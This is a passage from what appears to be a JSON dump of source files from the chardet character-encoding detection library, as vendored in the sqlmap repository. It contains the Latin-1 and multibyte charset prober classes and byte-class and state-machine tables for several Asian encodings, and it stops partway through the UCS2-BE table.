 ASV, ASV, ASV, ASV, ASV, ASO, ASO, ASO,   # F8 - FF\n)\n\n# 0 : illegal\n# 1 : very unlikely\n# 2 : normal\n# 3 : very likely\nLatin1ClassModel = (\n# UDF OTH ASC ASS ACV ACO ASV ASO\n    0,  0,  0,  0,  0,  0,  0,  0,  # UDF\n    0,  3,  3,  3,  3,  3,  3,  3,  # OTH\n    0,  3,  3,  3,  3,  3,  3,  3,  # ASC\n    0,  3,  3,  3,  1,  1,  3,  3,  # ASS\n    0,  3,  3,  3,  1,  2,  1,  2,  # ACV\n    0,  3,  3,  3,  3,  3,  3,  3,  # ACO\n    0,  3,  1,  3,  1,  1,  1,  3,  # ASV\n    0,  3,  1,  3,  1,  1,  3,  3,  # ASO\n)\n\n\nclass Latin1Prober(CharSetProber):\n    def __init__(self):\n        super(Latin1Prober, self).__init__()\n        self._last_char_class = None\n        self._freq_counter = None\n        self.reset()\n\n    def reset(self):\n        self._last_char_class = OTH\n        self._freq_counter = [0] * FREQ_CAT_NUM\n        CharSetProber.reset(self)\n\n    @property\n    def charset_name(self):\n        return \"ISO-8859-1\"\n\n    @property\n    def language(self):\n        return \"\"\n\n    def feed(self, byte_str):\n        byte_str = self.filter_with_english_letters(byte_str)\n        for c in byte_str:\n            char_class = Latin1_CharToClass[c]\n            freq = Latin1ClassModel[(self._last_char_class * CLASS_NUM)\n                                    + char_class]\n            if freq == 0:\n                self._state = ProbingState.NOT_ME\n                break\n            self._freq_counter[freq] += 1\n            self._last_char_class = char_class\n\n        return self.state\n\n    def get_confidence(self):\n        if self.state == ProbingState.NOT_ME:\n            return 0.01\n\n        total = sum(self._freq_counter)\n        if total < 0.01:\n            confidence = 0.0\n        else:\n            confidence = ((self._freq_counter[3] - self._freq_counter[1] * 20.0)\n                          / total)\n        if confidence < 0.0:\n            confidence = 0.0\n        # lower the confidence of latin1 so that other more accurate\n        # detector can take priority.\n        confidence = confidence * 0.73\n        return confidence\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/mbcharsetprober.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is Mozilla Universal charset detector code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 2001\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#   Shy Shalom - original C code\n#   Proofpoint, Inc.\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\nfrom .charsetprober import CharSetProber\nfrom .enums import ProbingState, MachineState\n\n\nclass MultiByteCharSetProber(CharSetProber):\n    \"\"\"\n    MultiByteCharSetProber\n    \"\"\"\n\n    def __init__(self, lang_filter=None):\n        super(MultiByteCharSetProber, self).__init__(lang_filter=lang_filter)\n        self.distribution_analyzer = None\n        self.coding_sm = None\n        self._last_char = [0, 0]\n\n    def reset(self):\n        super(MultiByteCharSetProber, self).reset()\n        if self.coding_sm:\n            self.coding_sm.reset()\n        if self.distribution_analyzer:\n            self.distribution_analyzer.reset()\n        self._last_char = [0, 0]\n\n    @property\n    def charset_name(self):\n        raise NotImplementedError\n\n    @property\n    def language(self):\n        raise NotImplementedError\n\n    def feed(self, byte_str):\n        for i in range(len(byte_str)):\n            coding_state = self.coding_sm.next_state(byte_str[i])\n            if coding_state == MachineState.ERROR:\n                self.logger.debug('%s %s prober hit error at byte %s',\n                                  self.charset_name, self.language, i)\n                self._state = ProbingState.NOT_ME\n                break\n            elif coding_state == MachineState.ITS_ME:\n                self._state = ProbingState.FOUND_IT\n                break\n            elif coding_state == MachineState.START:\n                char_len = self.coding_sm.get_current_charlen()\n                if i == 0:\n                    self._last_char[1] = byte_str[0]\n                    self.distribution_analyzer.feed(self._last_char, char_len)\n                else:\n                    self.distribution_analyzer.feed(byte_str[i - 1:i + 1],\n                                                    char_len)\n\n        self._last_char[0] = byte_str[-1]\n\n        if self.state == ProbingState.DETECTING:\n            if (self.distribution_analyzer.got_enough_data() and\n                    (self.get_confidence() > self.SHORTCUT_THRESHOLD)):\n                self._state = ProbingState.FOUND_IT\n\n        return self.state\n\n    def get_confidence(self):\n        return self.distribution_analyzer.get_confidence()\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/mbcsgroupprober.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is Mozilla Universal charset detector code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 2001\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#   Shy Shalom - original C code\n#   Proofpoint, Inc.\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\nfrom .charsetgroupprober import CharSetGroupProber\nfrom .utf8prober import UTF8Prober\nfrom .sjisprober import SJISProber\nfrom .eucjpprober import EUCJPProber\nfrom .gb2312prober import GB2312Prober\nfrom .euckrprober import EUCKRProber\nfrom .cp949prober import CP949Prober\nfrom .big5prober import Big5Prober\nfrom .euctwprober import EUCTWProber\n\n\nclass MBCSGroupProber(CharSetGroupProber):\n    def __init__(self, lang_filter=None):\n        super(MBCSGroupProber, self).__init__(lang_filter=lang_filter)\n        self.probers = [\n            UTF8Prober(),\n            SJISProber(),\n            EUCJPProber(),\n            GB2312Prober(),\n            EUCKRProber(),\n            CP949Prober(),\n            Big5Prober(),\n            EUCTWProber()\n        ]\n        self.reset()\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/mbcssm.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is mozilla.org code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 1998\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\nfrom .enums import MachineState\n\n# BIG5\n\nBIG5_CLS = (\n    1,1,1,1,1,1,1,1,  # 00 - 07    #allow 0x00 as legal value\n    1,1,1,1,1,1,0,0,  # 08 - 0f\n    1,1,1,1,1,1,1,1,  # 10 - 17\n    1,1,1,0,1,1,1,1,  # 18 - 1f\n    1,1,1,1,1,1,1,1,  # 20 - 27\n    1,1,1,1,1,1,1,1,  # 28 - 2f\n    1,1,1,1,1,1,1,1,  # 30 - 37\n    1,1,1,1,1,1,1,1,  # 38 - 3f\n    2,2,2,2,2,2,2,2,  # 40 - 47\n    2,2,2,2,2,2,2,2,  # 48 - 4f\n    2,2,2,2,2,2,2,2,  # 50 - 57\n    2,2,2,2,2,2,2,2,  # 58 - 5f\n    2,2,2,2,2,2,2,2,  # 60 - 67\n    2,2,2,2,2,2,2,2,  # 68 - 6f\n    2,2,2,2,2,2,2,2,  # 70 - 77\n    2,2,2,2,2,2,2,1,  # 78 - 7f\n    4,4,4,4,4,4,4,4,  # 80 - 87\n    4,4,4,4,4,4,4,4,  # 88 - 8f\n    4,4,4,4,4,4,4,4,  # 90 - 97\n    4,4,4,4,4,4,4,4,  # 98 - 9f\n    4,3,3,3,3,3,3,3,  # a0 - a7\n    3,3,3,3,3,3,3,3,  # a8 - af\n    3,3,3,3,3,3,3,3,  # b0 - b7\n    3,3,3,3,3,3,3,3,  # b8 - bf\n    3,3,3,3,3,3,3,3,  # c0 - c7\n    3,3,3,3,3,3,3,3,  # c8 - cf\n    3,3,3,3,3,3,3,3,  # d0 - d7\n    3,3,3,3,3,3,3,3,  # d8 - df\n    3,3,3,3,3,3,3,3,  # e0 - e7\n    3,3,3,3,3,3,3,3,  # e8 - ef\n    3,3,3,3,3,3,3,3,  # f0 - f7\n    3,3,3,3,3,3,3,0  # f8 - ff\n)\n\nBIG5_ST = (\n    MachineState.ERROR,MachineState.START,MachineState.START,     3,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,#00-07\n    MachineState.ERROR,MachineState.ERROR,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ERROR,#08-0f\n    MachineState.ERROR,MachineState.START,MachineState.START,MachineState.START,MachineState.START,MachineState.START,MachineState.START,MachineState.START#10-17\n)\n\nBIG5_CHAR_LEN_TABLE = (0, 1, 1, 2, 0)\n\nBIG5_SM_MODEL = {'class_table': BIG5_CLS,\n                 'class_factor': 5,\n                 'state_table': BIG5_ST,\n                 'char_len_table': BIG5_CHAR_LEN_TABLE,\n                 'name': 'Big5'}\n\n# CP949\n\nCP949_CLS  = (\n    1,1,1,1,1,1,1,1, 1,1,1,1,1,1,0,0,  # 00 - 0f\n    1,1,1,1,1,1,1,1, 1,1,1,0,1,1,1,1,  # 10 - 1f\n    1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,  # 20 - 2f\n    1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,  # 30 - 3f\n    1,4,4,4,4,4,4,4, 4,4,4,4,4,4,4,4,  # 40 - 4f\n    4,4,5,5,5,5,5,5, 5,5,5,1,1,1,1,1,  # 50 - 5f\n    1,5,5,5,5,5,5,5, 5,5,5,5,5,5,5,5,  # 60 - 6f\n    5,5,5,5,5,5,5,5, 5,5,5,1,1,1,1,1,  # 70 - 7f\n    0,6,6,6,6,6,6,6, 6,6,6,6,6,6,6,6,  # 80 - 8f\n    6,6,6,6,6,6,6,6, 6,6,6,6,6,6,6,6,  # 90 - 9f\n    6,7,7,7,7,7,7,7, 7,7,7,7,7,8,8,8,  # a0 - af\n    7,7,7,7,7,7,7,7, 7,7,7,7,7,7,7,7,  # b0 - bf\n    7,7,7,7,7,7,9,2, 2,3,2,2,2,2,2,2,  # c0 - cf\n    2,2,2,2,2,2,2,2, 2,2,2,2,2,2,2,2,  # d0 - df\n    2,2,2,2,2,2,2,2, 2,2,2,2,2,2,2,2,  # e0 - ef\n    2,2,2,2,2,2,2,2, 2,2,2,2,2,2,2,0,  # f0 - ff\n)\n\nCP949_ST = (\n#cls=    0      1      2      3      4      5      6      7      8      9  # previous state =\n    MachineState.ERROR,MachineState.START,     3,MachineState.ERROR,MachineState.START,MachineState.START,     4,     5,MachineState.ERROR,     6, # MachineState.START\n    MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR, # MachineState.ERROR\n    MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME, # MachineState.ITS_ME\n    MachineState.ERROR,MachineState.ERROR,MachineState.START,MachineState.START,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.START,MachineState.START,MachineState.START, # 3\n    MachineState.ERROR,MachineState.ERROR,MachineState.START,MachineState.START,MachineState.START,MachineState.START,MachineState.START,MachineState.START,MachineState.START,MachineState.START, # 4\n    MachineState.ERROR,MachineState.START,MachineState.START,MachineState.START,MachineState.START,MachineState.START,MachineState.START,MachineState.START,MachineState.START,MachineState.START, # 5\n    MachineState.ERROR,MachineState.START,MachineState.START,MachineState.START,MachineState.START,MachineState.ERROR,MachineState.ERROR,MachineState.START,MachineState.START,MachineState.START, # 6\n)\n\nCP949_CHAR_LEN_TABLE = (0, 1, 2, 0, 1, 1, 2, 2, 0, 2)\n\nCP949_SM_MODEL = {'class_table': CP949_CLS,\n                  'class_factor': 10,\n                  'state_table': CP949_ST,\n                  'char_len_table': CP949_CHAR_LEN_TABLE,\n                  'name': 'CP949'}\n\n# EUC-JP\n\nEUCJP_CLS = (\n    4,4,4,4,4,4,4,4,  # 00 - 07\n    4,4,4,4,4,4,5,5,  # 08 - 0f\n    4,4,4,4,4,4,4,4,  # 10 - 17\n    4,4,4,5,4,4,4,4,  # 18 - 1f\n    4,4,4,4,4,4,4,4,  # 20 - 27\n    4,4,4,4,4,4,4,4,  # 28 - 2f\n    4,4,4,4,4,4,4,4,  # 30 - 37\n    4,4,4,4,4,4,4,4,  # 38 - 3f\n    4,4,4,4,4,4,4,4,  # 40 - 47\n    4,4,4,4,4,4,4,4,  # 48 - 4f\n    4,4,4,4,4,4,4,4,  # 50 - 57\n    4,4,4,4,4,4,4,4,  # 58 - 5f\n    4,4,4,4,4,4,4,4,  # 60 - 67\n    4,4,4,4,4,4,4,4,  # 68 - 6f\n    4,4,4,4,4,4,4,4,  # 70 - 77\n    4,4,4,4,4,4,4,4,  # 78 - 7f\n    5,5,5,5,5,5,5,5,  # 80 - 87\n    5,5,5,5,5,5,1,3,  # 88 - 8f\n    5,5,5,5,5,5,5,5,  # 90 - 97\n    5,5,5,5,5,5,5,5,  # 98 - 9f\n    5,2,2,2,2,2,2,2,  # a0 - a7\n    2,2,2,2,2,2,2,2,  # a8 - af\n    2,2,2,2,2,2,2,2,  # b0 - b7\n    2,2,2,2,2,2,2,2,  # b8 - bf\n    2,2,2,2,2,2,2,2,  # c0 - c7\n    2,2,2,2,2,2,2,2,  # c8 - cf\n    2,2,2,2,2,2,2,2,  # d0 - d7\n    2,2,2,2,2,2,2,2,  # d8 - df\n    0,0,0,0,0,0,0,0,  # e0 - e7\n    0,0,0,0,0,0,0,0,  # e8 - ef\n    0,0,0,0,0,0,0,0,  # f0 - f7\n    0,0,0,0,0,0,0,5  # f8 - ff\n)\n\nEUCJP_ST = (\n          3,     4,     3,     5,MachineState.START,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,#00-07\n     MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,#08-0f\n     MachineState.ITS_ME,MachineState.ITS_ME,MachineState.START,MachineState.ERROR,MachineState.START,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,#10-17\n     MachineState.ERROR,MachineState.ERROR,MachineState.START,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,     3,MachineState.ERROR,#18-1f\n          3,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.START,MachineState.START,MachineState.START,MachineState.START#20-27\n)\n\nEUCJP_CHAR_LEN_TABLE = (2, 2, 2, 3, 1, 0)\n\nEUCJP_SM_MODEL = {'class_table': EUCJP_CLS,\n                  'class_factor': 6,\n                  'state_table': EUCJP_ST,\n                  'char_len_table': EUCJP_CHAR_LEN_TABLE,\n                  'name': 'EUC-JP'}\n\n# EUC-KR\n\nEUCKR_CLS  = (\n    1,1,1,1,1,1,1,1,  # 00 - 07\n    1,1,1,1,1,1,0,0,  # 08 - 0f\n    1,1,1,1,1,1,1,1,  # 10 - 17\n    1,1,1,0,1,1,1,1,  # 18 - 1f\n    1,1,1,1,1,1,1,1,  # 20 - 27\n    1,1,1,1,1,1,1,1,  # 28 - 2f\n    1,1,1,1,1,1,1,1,  # 30 - 37\n    1,1,1,1,1,1,1,1,  # 38 - 3f\n    1,1,1,1,1,1,1,1,  # 40 - 47\n    1,1,1,1,1,1,1,1,  # 48 - 4f\n    1,1,1,1,1,1,1,1,  # 50 - 57\n    1,1,1,1,1,1,1,1,  # 58 - 5f\n    1,1,1,1,1,1,1,1,  # 60 - 67\n    1,1,1,1,1,1,1,1,  # 68 - 6f\n    1,1,1,1,1,1,1,1,  # 70 - 77\n    1,1,1,1,1,1,1,1,  # 78 - 7f\n    0,0,0,0,0,0,0,0,  # 80 - 87\n    0,0,0,0,0,0,0,0,  # 88 - 8f\n    0,0,0,0,0,0,0,0,  # 90 - 97\n    0,0,0,0,0,0,0,0,  # 98 - 9f\n    0,2,2,2,2,2,2,2,  # a0 - a7\n    2,2,2,2,2,3,3,3,  # a8 - af\n    2,2,2,2,2,2,2,2,  # b0 - b7\n    2,2,2,2,2,2,2,2,  # b8 - bf\n    2,2,2,2,2,2,2,2,  # c0 - c7\n    2,3,2,2,2,2,2,2,  # c8 - cf\n    2,2,2,2,2,2,2,2,  # d0 - d7\n    2,2,2,2,2,2,2,2,  # d8 - df\n    2,2,2,2,2,2,2,2,  # e0 - e7\n    2,2,2,2,2,2,2,2,  # e8 - ef\n    2,2,2,2,2,2,2,2,  # f0 - f7\n    2,2,2,2,2,2,2,0   # f8 - ff\n)\n\nEUCKR_ST = (\n    MachineState.ERROR,MachineState.START,     3,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,#00-07\n    MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ERROR,MachineState.ERROR,MachineState.START,MachineState.START #08-0f\n)\n\nEUCKR_CHAR_LEN_TABLE = (0, 1, 2, 0)\n\nEUCKR_SM_MODEL = {'class_table': EUCKR_CLS,\n                'class_factor': 4,\n                'state_table': EUCKR_ST,\n                'char_len_table': EUCKR_CHAR_LEN_TABLE,\n                'name': 'EUC-KR'}\n\n# EUC-TW\n\nEUCTW_CLS = (\n    2,2,2,2,2,2,2,2,  # 00 - 07\n    2,2,2,2,2,2,0,0,  # 08 - 0f\n    2,2,2,2,2,2,2,2,  # 10 - 17\n    2,2,2,0,2,2,2,2,  # 18 - 1f\n    2,2,2,2,2,2,2,2,  # 20 - 27\n    2,2,2,2,2,2,2,2,  # 28 - 2f\n    2,2,2,2,2,2,2,2,  # 30 - 37\n    2,2,2,2,2,2,2,2,  # 38 - 3f\n    2,2,2,2,2,2,2,2,  # 40 - 47\n    2,2,2,2,2,2,2,2,  # 48 - 4f\n    2,2,2,2,2,2,2,2,  # 50 - 57\n    2,2,2,2,2,2,2,2,  # 58 - 5f\n    2,2,2,2,2,2,2,2,  # 60 - 67\n    2,2,2,2,2,2,2,2,  # 68 - 6f\n    2,2,2,2,2,2,2,2,  # 70 - 77\n    2,2,2,2,2,2,2,2,  # 78 - 7f\n    0,0,0,0,0,0,0,0,  # 80 - 87\n    0,0,0,0,0,0,6,0,  # 88 - 8f\n    0,0,0,0,0,0,0,0,  # 90 - 97\n    0,0,0,0,0,0,0,0,  # 98 - 9f\n    0,3,4,4,4,4,4,4,  # a0 - a7\n    5,5,1,1,1,1,1,1,  # a8 - af\n    1,1,1,1,1,1,1,1,  # b0 - b7\n    1,1,1,1,1,1,1,1,  # b8 - bf\n    1,1,3,1,3,3,3,3,  # c0 - c7\n    3,3,3,3,3,3,3,3,  # c8 - cf\n    3,3,3,3,3,3,3,3,  # d0 - d7\n    3,3,3,3,3,3,3,3,  # d8 - df\n    3,3,3,3,3,3,3,3,  # e0 - e7\n    3,3,3,3,3,3,3,3,  # e8 - ef\n    3,3,3,3,3,3,3,3,  # f0 - f7\n    3,3,3,3,3,3,3,0   # f8 - ff\n)\n\nEUCTW_ST = (\n    MachineState.ERROR,MachineState.ERROR,MachineState.START,     3,     3,     3,     4,MachineState.ERROR,#00-07\n    MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ITS_ME,MachineState.ITS_ME,#08-0f\n    MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ERROR,MachineState.START,MachineState.ERROR,#10-17\n    MachineState.START,MachineState.START,MachineState.START,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,#18-1f\n         5,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.START,MachineState.ERROR,MachineState.START,MachineState.START,#20-27\n    MachineState.START,MachineState.ERROR,MachineState.START,MachineState.START,MachineState.START,MachineState.START,MachineState.START,MachineState.START #28-2f\n)\n\nEUCTW_CHAR_LEN_TABLE = (0, 0, 1, 2, 2, 2, 3)\n\nEUCTW_SM_MODEL = {'class_table': EUCTW_CLS,\n                'class_factor': 7,\n                'state_table': EUCTW_ST,\n                'char_len_table': EUCTW_CHAR_LEN_TABLE,\n                'name': 'x-euc-tw'}\n\n# GB2312\n\nGB2312_CLS = (\n    1,1,1,1,1,1,1,1,  # 00 - 07\n    1,1,1,1,1,1,0,0,  # 08 - 0f\n    1,1,1,1,1,1,1,1,  # 10 - 17\n    1,1,1,0,1,1,1,1,  # 18 - 1f\n    1,1,1,1,1,1,1,1,  # 20 - 27\n    1,1,1,1,1,1,1,1,  # 28 - 2f\n    3,3,3,3,3,3,3,3,  # 30 - 37\n    3,3,1,1,1,1,1,1,  # 38 - 3f\n    2,2,2,2,2,2,2,2,  # 40 - 47\n    2,2,2,2,2,2,2,2,  # 48 - 4f\n    2,2,2,2,2,2,2,2,  # 50 - 57\n    2,2,2,2,2,2,2,2,  # 58 - 5f\n    2,2,2,2,2,2,2,2,  # 60 - 67\n    2,2,2,2,2,2,2,2,  # 68 - 6f\n    2,2,2,2,2,2,2,2,  # 70 - 77\n    2,2,2,2,2,2,2,4,  # 78 - 7f\n    5,6,6,6,6,6,6,6,  # 80 - 87\n    6,6,6,6,6,6,6,6,  # 88 - 8f\n    6,6,6,6,6,6,6,6,  # 90 - 97\n    6,6,6,6,6,6,6,6,  # 98 - 9f\n    6,6,6,6,6,6,6,6,  # a0 - a7\n    6,6,6,6,6,6,6,6,  # a8 - af\n    6,6,6,6,6,6,6,6,  # b0 - b7\n    6,6,6,6,6,6,6,6,  # b8 - bf\n    6,6,6,6,6,6,6,6,  # c0 - c7\n    6,6,6,6,6,6,6,6,  # c8 - cf\n    6,6,6,6,6,6,6,6,  # d0 - d7\n    6,6,6,6,6,6,6,6,  # d8 - df\n    6,6,6,6,6,6,6,6,  # e0 - e7\n    6,6,6,6,6,6,6,6,  # e8 - ef\n    6,6,6,6,6,6,6,6,  # f0 - f7\n    6,6,6,6,6,6,6,0   # f8 - ff\n)\n\nGB2312_ST = (\n    MachineState.ERROR,MachineState.START,MachineState.START,MachineState.START,MachineState.START,MachineState.START,     3,MachineState.ERROR,#00-07\n    MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ITS_ME,MachineState.ITS_ME,#08-0f\n    MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ERROR,MachineState.ERROR,MachineState.START,#10-17\n         4,MachineState.ERROR,MachineState.START,MachineState.START,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,#18-1f\n    MachineState.ERROR,MachineState.ERROR,     5,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ITS_ME,MachineState.ERROR,#20-27\n    MachineState.ERROR,MachineState.ERROR,MachineState.START,MachineState.START,MachineState.START,MachineState.START,MachineState.START,MachineState.START #28-2f\n)\n\n# To be accurate, the length of class 6 can be either 2 or 4.\n# But it is not necessary to discriminate between the two since\n# it is used for frequency analysis only, and we are validating\n# each code range there as well. So it is safe to set it to be\n# 2 here.\nGB2312_CHAR_LEN_TABLE = (0, 1, 1, 1, 1, 1, 2)\n\nGB2312_SM_MODEL = {'class_table': GB2312_CLS,\n                   'class_factor': 7,\n                   'state_table': GB2312_ST,\n                   'char_len_table': GB2312_CHAR_LEN_TABLE,\n                   'name': 'GB2312'}\n\n# Shift_JIS\n\nSJIS_CLS = (\n    1,1,1,1,1,1,1,1,  # 00 - 07\n    1,1,1,1,1,1,0,0,  # 08 - 0f\n    1,1,1,1,1,1,1,1,  # 10 - 17\n    1,1,1,0,1,1,1,1,  # 18 - 1f\n    1,1,1,1,1,1,1,1,  # 20 - 27\n    1,1,1,1,1,1,1,1,  # 28 - 2f\n    1,1,1,1,1,1,1,1,  # 30 - 37\n    1,1,1,1,1,1,1,1,  # 38 - 3f\n    2,2,2,2,2,2,2,2,  # 40 - 47\n    2,2,2,2,2,2,2,2,  # 48 - 4f\n    2,2,2,2,2,2,2,2,  # 50 - 57\n    2,2,2,2,2,2,2,2,  # 58 - 5f\n    2,2,2,2,2,2,2,2,  # 60 - 67\n    2,2,2,2,2,2,2,2,  # 68 - 6f\n    2,2,2,2,2,2,2,2,  # 70 - 77\n    2,2,2,2,2,2,2,1,  # 78 - 7f\n    3,3,3,3,3,2,2,3,  # 80 - 87\n    3,3,3,3,3,3,3,3,  # 88 - 8f\n    3,3,3,3,3,3,3,3,  # 90 - 97\n    3,3,3,3,3,3,3,3,  # 98 - 9f\n    #0xa0 is illegal in sjis encoding, but some pages does\n    #contain such byte. We need to be more error forgiven.\n    2,2,2,2,2,2,2,2,  # a0 - a7\n    2,2,2,2,2,2,2,2,  # a8 - af\n    2,2,2,2,2,2,2,2,  # b0 - b7\n    2,2,2,2,2,2,2,2,  # b8 - bf\n    2,2,2,2,2,2,2,2,  # c0 - c7\n    2,2,2,2,2,2,2,2,  # c8 - cf\n    2,2,2,2,2,2,2,2,  # d0 - d7\n    2,2,2,2,2,2,2,2,  # d8 - df\n    3,3,3,3,3,3,3,3,  # e0 - e7\n    3,3,3,3,3,4,4,4,  # e8 - ef\n    3,3,3,3,3,3,3,3,  # f0 - f7\n    3,3,3,3,3,0,0,0)  # f8 - ff\n\n\nSJIS_ST = (\n    MachineState.ERROR,MachineState.START,MachineState.START,     3,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,#00-07\n    MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,#08-0f\n    MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ERROR,MachineState.ERROR,MachineState.START,MachineState.START,MachineState.START,MachineState.START #10-17\n)\n\nSJIS_CHAR_LEN_TABLE = (0, 1, 1, 2, 0, 0)\n\nSJIS_SM_MODEL = {'class_table': SJIS_CLS,\n               'class_factor': 6,\n               'state_table': SJIS_ST,\n               'char_len_table': SJIS_CHAR_LEN_TABLE,\n               'name': 'Shift_JIS'}\n\n# UCS2-BE\n\nUCS2BE_CLS = (\n    0,0,0,0,0,0,0,0,  # 00 - 07\n    0,0,1,0,0,2,0,0,  # 08 - 0f\n    0,0,0,0,0,0,0,0,  # 10 - 17\n    0,0,0,3,0,0,0,0,  # 18 - 1f\n    0,0,0,0,0,0,0,0,  # 20 - 27\n    0,3,3,3,3,3,0,0,  # 28 - 2f\n    0,0,0,0,0,0,0,0,  # 30 - 37\n    0,0,0,0,0,0,0,0,  # 38 - 3f\n    0,0,0,0,0,0,0,0,  # 40 - 47\n    0,0,0,0,0,0,0,0,  # 48 - 4f\n    0,0,0,0,0,0,0,0,  # 50 - 57\n    0,0,0,0,0,0,0,0,  # 58 - 5f\n    0,0,0,0,0,0,0,0,  # 60 - 67\n    0,0,0,0,0,0,0,0,  # 68 - 6f\n    0,0,0,0,0,0,0,0,  # 70 - 77\n    0,0,0,0,0,0,0,0,  # 78 - 7f\n    0,0,0,0,0,0,0,0,  # 80 - 87\n    0,0,0,0,0,0,0,0,  # 88 - 8f\n    0,0,0,0,0,0,0,0,  # 90 - 97\n    0,0,0,0,0,0,0,0,  # 98 - 9f\n    0,0,0,0,0,0,0,0,  # a0 - a7\n    0,0,0,0,0,0,0,0,  # a8 - af\n    0,0,0,0,0,0,0,0,  # b0 - b7\n    0,0,0,0,0,0,0,0,  # b8 - bf\n    0,0,0,0,0,0,0,0,  # c0 - c7\n    0,0,0,0,0,0,0,0,  # c8 - cf\n    0,0,0,0,0,0,0,0,  # d0 - d7\n    0,0,0,0,0,0,0,0,  # d8 - df\n    0,0,0,0,0,0,0,0,  # e0 - e7\n    0,0,0,0,0,0,0,0,  # e8 - ef\n    0,0,0,0,0,0,0,0,  # f0 - f7\n    0,0,0,0,0,0,4,5   # f8 - ff\n)\n\nUCS2BE_ST  = (\n          5,     7,     7,MachineState.ERROR,     4,     3,MachineState.ERROR,MachineState.ERROR,#00-07\n     MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,#08-0f\n     